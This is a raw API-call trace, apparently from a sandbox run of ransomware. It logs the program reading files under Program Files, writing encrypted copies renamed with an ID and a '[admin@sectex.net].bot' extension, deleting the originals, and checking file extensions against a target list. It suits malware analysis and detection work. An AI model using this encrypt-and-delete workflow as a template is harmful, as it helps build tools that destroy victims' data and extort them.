	[0139.599] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.599] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0139.635] GetLastError () returned 0x0
	[0139.635] ReadFile (in: hFile=0x39c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3a18, lpOverlapped=0x0) returned 1
	[0139.646] WriteFile (in: hFile=0x3a0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3a20, lpOverlapped=0x0) returned 1
	[0139.647] ReadFile (in: hFile=0x39c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.647] WriteFile (in: hFile=0x3a0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0139.647] SetEndOfFile (hFile=0x3a0) returned 1
	[0139.648] CloseHandle (hObject=0x3a0) returned 1
	[0139.648] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.648] SetEndOfFile (hFile=0x39c) returned 1
	[0139.650] CloseHandle (hObject=0x39c) returned 1
	[0139.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.656] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll")) returned 1
	[0139.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.656] lstrlenW (lpString=".doc") returned 4
	[0139.656] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1
	[0139.656] lstrlenW (lpString=".docx") returned 5
	[0139.656] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1
	[0139.656] lstrlenW (lpString=".pdf") returned 4
	[0139.656] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1
	[0139.656] lstrlenW (lpString=".xls") returned 4
	[0139.656] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1
	[0139.656] lstrlenW (lpString=".xlsx") returned 5
	[0139.656] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1
	[0139.656] lstrlenW (lpString=".ppt") returned 4
	[0139.656] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1
	[0139.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.656] lstrlenW (lpString=".zip") returned 4
	[0139.656] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1
	[0139.656] lstrlenW (lpString=".rar") returned 4
	[0139.656] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1
	[0139.656] lstrlenW (lpString=".bz2") returned 4
	[0139.657] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString=".7z") returned 3
	[0139.657] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString=".dbf") returned 4
	[0139.657] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString=".1cd") returned 4
	[0139.657] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString=".jpg") returned 4
	[0139.657] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString=".doc") returned 4
	[0139.657] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString=".docx") returned 5
	[0139.657] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1
	[0139.657] lstrlenW (lpString=".pdf") returned 4
	[0139.657] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString=".xls") returned 4
	[0139.657] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1
	[0139.657] lstrlenW (lpString=".xlsx") returned 5
	[0139.657] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1
	[0139.657] lstrlenW (lpString=".ppt") returned 4
	[0139.657] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.657] lstrlenW (lpString=".zip") returned 4
	[0139.657] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1
	[0139.657] lstrlenW (lpString=".rar") returned 4
	[0139.657] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1
	[0139.657] lstrlenW (lpString=".bz2") returned 4
	[0139.657] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1
	[0139.658] lstrlenW (lpString=".7z") returned 3
	[0139.658] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1
	[0139.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.658] lstrlenW (lpString=".dbf") returned 4
	[0139.658] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1
	[0139.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.658] lstrlenW (lpString=".1cd") returned 4
	[0139.658] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1
	[0139.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85
	[0139.658] lstrlenW (lpString=".jpg") returned 4
	[0139.658] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1
	[0139.658] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.658] lstrlenW (lpString="CMNTY_01.MID") returned 12
	[0139.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0139.763] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6970) returned 1
	[0139.763] CloseHandle (hObject=0x388) returned 1
	[0139.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 0x20
	[0139.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.765] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.766] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.790] GetLastError () returned 0x0
	[0139.790] ReadFile (in: hFile=0x398, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1b3a, lpOverlapped=0x0) returned 1
	[0139.792] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1b40, lpOverlapped=0x0) returned 1
	[0139.794] ReadFile (in: hFile=0x398, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.794] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.794] SetEndOfFile (hFile=0x3a8) returned 1
	[0139.794] CloseHandle (hObject=0x3a8) returned 1
	[0139.794] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.794] SetEndOfFile (hFile=0x398) returned 1
	[0139.796] CloseHandle (hObject=0x398) returned 1
	[0139.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 1
	[0139.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.797] lstrlenW (lpString=".doc") returned 4
	[0139.797] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.797] lstrlenW (lpString=".docx") returned 5
	[0139.797] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.797] lstrlenW (lpString=".pdf") returned 4
	[0139.797] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.797] lstrlenW (lpString=".xls") returned 4
	[0139.797] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.797] lstrlenW (lpString=".xlsx") returned 5
	[0139.797] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.797] lstrlenW (lpString=".ppt") returned 4
	[0139.797] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString=".zip") returned 4
	[0139.798] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.798] lstrlenW (lpString=".rar") returned 4
	[0139.798] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.798] lstrlenW (lpString=".bz2") returned 4
	[0139.798] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.798] lstrlenW (lpString=".7z") returned 3
	[0139.798] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString=".dbf") returned 4
	[0139.798] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString=".1cd") returned 4
	[0139.798] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString=".jpg") returned 4
	[0139.798] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.798] lstrlenW (lpString=".doc") returned 4
	[0139.798] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.798] lstrlenW (lpString=".docx") returned 5
	[0139.798] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.798] lstrlenW (lpString=".pdf") returned 4
	[0139.798] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.798] lstrlenW (lpString=".xls") returned 4
	[0139.798] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.798] lstrlenW (lpString=".xlsx") returned 5
	[0139.798] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.798] lstrlenW (lpString=".ppt") returned 4
	[0139.798] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.799] lstrlenW (lpString=".zip") returned 4
	[0139.799] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.799] lstrlenW (lpString=".rar") returned 4
	[0139.799] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.799] lstrlenW (lpString=".bz2") returned 4
	[0139.799] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.799] lstrlenW (lpString=".7z") returned 3
	[0139.799] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.799] lstrlenW (lpString=".dbf") returned 4
	[0139.799] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.799] lstrlenW (lpString=".1cd") returned 4
	[0139.799] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63
	[0139.799] lstrlenW (lpString=".jpg") returned 4
	[0139.799] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.799] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.799] lstrlenW (lpString="EXPLR_01.MID") returned 12
	[0139.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.800] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=10562) returned 1
	[0139.800] CloseHandle (hObject=0x398) returned 1
	[0139.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 0x20
	[0139.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.800] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.800] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.801] GetLastError () returned 0x0
	[0139.801] ReadFile (in: hFile=0x398, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x2942, lpOverlapped=0x0) returned 1
	[0139.802] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x2950, lpOverlapped=0x0) returned 1
	[0139.803] ReadFile (in: hFile=0x398, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.803] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.803] SetEndOfFile (hFile=0x3a8) returned 1
	[0139.803] CloseHandle (hObject=0x3a8) returned 1
	[0139.804] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.804] SetEndOfFile (hFile=0x398) returned 1
	[0139.819] CloseHandle (hObject=0x398) returned 1
	[0139.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.871] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 1
	[0139.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.933] lstrlenW (lpString=".doc") returned 4
	[0139.933] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.933] lstrlenW (lpString=".docx") returned 5
	[0139.933] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.933] lstrlenW (lpString=".pdf") returned 4
	[0139.933] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.933] lstrlenW (lpString=".xls") returned 4
	[0139.933] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.933] lstrlenW (lpString=".xlsx") returned 5
	[0139.933] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.933] lstrlenW (lpString=".ppt") returned 4
	[0139.933] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.933] lstrlenW (lpString=".zip") returned 4
	[0139.933] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.933] lstrlenW (lpString=".rar") returned 4
	[0139.933] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.933] lstrlenW (lpString=".bz2") returned 4
	[0139.933] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.933] lstrlenW (lpString=".7z") returned 3
	[0139.933] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.933] lstrlenW (lpString=".dbf") returned 4
	[0139.933] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".1cd") returned 4
	[0139.934] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".jpg") returned 4
	[0139.934] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".doc") returned 4
	[0139.934] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString=".docx") returned 5
	[0139.934] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.934] lstrlenW (lpString=".pdf") returned 4
	[0139.934] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.934] lstrlenW (lpString=".xls") returned 4
	[0139.934] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.934] lstrlenW (lpString=".xlsx") returned 5
	[0139.934] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.934] lstrlenW (lpString=".ppt") returned 4
	[0139.934] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".zip") returned 4
	[0139.934] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.934] lstrlenW (lpString=".rar") returned 4
	[0139.934] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.934] lstrlenW (lpString=".bz2") returned 4
	[0139.934] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString=".7z") returned 3
	[0139.934] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".dbf") returned 4
	[0139.934] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.934] lstrlenW (lpString=".1cd") returned 4
	[0139.935] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63
	[0139.935] lstrlenW (lpString=".jpg") returned 4
	[0139.935] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.935] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.935] lstrlenW (lpString="FINCL_01.MID") returned 12
	[0139.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0139.941] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=12981) returned 1
	[0139.942] CloseHandle (hObject=0x3a0) returned 1
	[0139.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 0x20
	[0139.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0139.977] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
